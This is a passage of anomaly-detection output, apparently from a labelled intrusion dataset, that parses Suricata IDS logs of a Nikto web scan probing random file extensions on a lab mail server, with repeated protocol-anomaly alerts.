"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.*", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46876, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":486095792505167,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 486095792505167, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.263864+0000\",\"flow_id\":486095792505167,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.265515 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46878 -> 192.168.10.154:80", "/parser/model/time": 1583349514.265515, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46878, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.265515 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46878 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.phpp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.265852+0000\",\"flow_id\":1618846172187243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.265852, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1618846172187243,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.phpp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.phpp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.phpp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.phpp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46878, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1618846172187243,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1618846172187243, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.265852+0000\",\"flow_id\":1618846172187243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.268069 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46880 -> 192.168.10.154:80", "/parser/model/time": 1583349514.268069, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46880, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.268069 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46880 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsconfig", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.268291+0000\",\"flow_id\":127685066625492,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.268291, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":127685066625492,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsconfig\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsconfig\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsconfig", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsconfig", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46880, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":127685066625492,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 127685066625492, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.268291+0000\",\"flow_id\":127685066625492,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.270141 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46882 -> 192.168.10.154:80", "/parser/model/time": 1583349514.270141, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46882, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.270141 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46882 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.axd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.270360+0000\",\"flow_id\":531532251536341,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.27036, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":531532251536341,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": 